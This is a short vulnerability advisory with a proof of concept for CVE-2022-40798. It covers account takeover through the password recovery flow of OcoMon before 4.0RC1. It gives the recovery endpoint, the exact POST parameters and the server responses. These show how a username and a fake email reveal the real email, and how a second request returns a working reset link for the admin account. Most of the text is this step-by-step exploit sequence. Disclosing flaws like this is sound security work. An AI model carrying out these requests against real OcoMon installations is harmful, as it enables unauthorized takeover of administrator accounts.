OcoMon < 4.0RC1 - Account Takeover [CVE-2022-40798]
Description
Through password recovery its possible to obtain a token to reset password of any user.
Bug - 1
The vulnerability occurs because the application validates the email in database and returns the real email to the user.
Bug - 2
If username and email are valid, the application returns to user the link to reset the password instead of sending it by email.
PoC
- Access "Esqueci minha senha:
- Enter a valid username (example: admin) and a fake email.
- The user's real email will be exposed in the response:
- Send the request again replacing the fake email to user original email:
- In the request response have the link to change the user's password, just access and change:
Examples:
URL: https://ocomon.site/includes/common/require_access_recovery_process.php
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=anything@email.com&action=require_recovery
RESPONSE: "action":"require_recovery","field_id":"email","login_name":"admin","email":"anything@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com"}
URL: https://ocomon.site/includes/common/require_access_recovery_process.php
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=realemail@email.com&action=require_recovery
RESPONSE: "action":"require_recovery","field_id":"","login_name":"admin","email":"realemail@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com","rand":"b39abfbd697e566d178e678462b0b6c1","forget_link":"https:\/\/ocomon.site\/setNewPass.php?code=1|b39abfbd697e566d178e678462b0b6c1"}





